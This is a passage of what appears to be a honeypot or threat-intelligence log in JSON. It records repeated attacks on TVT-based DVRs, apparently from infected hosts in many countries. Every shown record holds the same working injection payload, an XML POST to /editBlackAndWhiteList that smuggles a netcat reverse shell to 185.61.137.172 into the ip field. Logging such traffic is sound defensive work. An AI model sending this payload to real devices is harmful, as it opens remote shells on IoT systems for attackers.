- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 85,
- "first_seen": "2019-12-19T09:11:24Z",
- "last_seen": "2019-12-19T09:11:24Z"
- },
- {
- "source_ip_address": "189.219.39.226",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T08:51:55Z",
- "last_seen": "2019-12-19T08:51:55Z"
- },
- {
- "source_ip_address": "220.135.182.2",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T08:51:08Z",
- "last_seen": "2019-12-19T08:51:08Z"
- },
- {
- "source_ip_address": "175.205.159.77",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T08:20:34Z",
- "last_seen": "2019-12-19T08:20:34Z"
- },
- {
- "source_ip_address": "123.110.233.90",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T08:19:36Z",
- "last_seen": "2019-12-19T08:19:36Z"
- },
- {
- "source_ip_address": "96.41.35.18",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T08:04:09Z",
- "last_seen": "2019-12-19T08:04:09Z"
- },
- {
- "source_ip_address": "154.54.216.52",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T07:03:19Z",
- "last_seen": "2019-12-19T07:03:19Z"
- },
- {
- "source_ip_address": "188.234.116.218",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T06:47:39Z",
- "last_seen": "2019-12-19T06:47:39Z"
- },
- {
- "source_ip_address": "188.30.43.134",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T06:38:55Z",
- "last_seen": "2019-12-19T06:38:55Z"
- },
- {
- "source_ip_address": "220.130.149.48",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 100,
- "first_seen": "2019-12-19T06:34:03Z",
- "last_seen": "2019-12-19T06:34:03Z"
- },
- {
- "source_ip_address": "24.8.169.178",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T05:56:41Z",
- "last_seen": "2019-12-19T05:56:41Z"
- },
- {
- "source_ip_address": "172.116.0.34",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T05:54:52Z",
- "last_seen": "2019-12-19T05:54:52Z"
- },
- {
- "source_ip_address": "189.213.222.19",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T05:49:15Z",
- "last_seen": "2019-12-19T05:49:15Z"
- },
- {
- "source_ip_address": "96.76.66.161",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T05:48:04Z",
- "last_seen": "2019-12-19T05:48:04Z"
- },
- {
- "source_ip_address": "189.225.185.138",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T05:36:16Z",
- "last_seen": "2019-12-19T05:36:16Z"
- },
- {
- "source_ip_address": "218.161.124.77",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T05:27:24Z",
- "last_seen": "2019-12-19T05:27:24Z"
- },
- {
- "source_ip_address": "79.130.47.175",
- "country": "GR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T05:19:22Z",
- "last_seen": "2019-12-19T05:19:22Z"
- },
- {
- "source_ip_address": "50.195.159.9",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T04:57:26Z",
- "last_seen": "2019-12-19T04:57:26Z"
- },
- {
- "source_ip_address": "189.225.77.18",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T04:51:53Z",
- "last_seen": "2019-12-19T04:51:53Z"
- },
- {
- "source_ip_address": "78.186.185.104",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T04:51:00Z",
- "last_seen": "2019-12-19T04:51:00Z"
- },
- {
- "source_ip_address": "47.197.193.9",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T04:50:21Z",
- "last_seen": "2019-12-19T04:50:21Z"
- },
- {
- "source_ip_address": "220.130.170.139",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T04:36:44Z",
- "last_seen": "2019-12-19T04:36:44Z"
- },
- {
- "source_ip_address": "95.92.202.142",
- "country": "PT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T03:50:17Z",
- "last_seen": "2019-12-19T03:50:17Z"
- },
- {
- "source_ip_address": "67.78.189.20",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T03:26:58Z",
- "last_seen": "2019-12-19T03:26:58Z"
- },
- {
- "source_ip_address": "31.179.233.207",
- "country": "PL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T03:22:58Z",
- "last_seen": "2019-12-19T03:22:58Z"
- },
- {
- "source_ip_address": "83.44.10.77",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T03:22:26Z",
- "last_seen": "2019-12-19T03:22:26Z"
- },
- {
- "source_ip_address": "185.205.8.47",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 17,
- "first_seen": "2019-12-18T19:19:22Z",
- "last_seen": "2019-12-19T03:16:20Z"
- },
- {
- "source_ip_address": "114.34.190.171",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
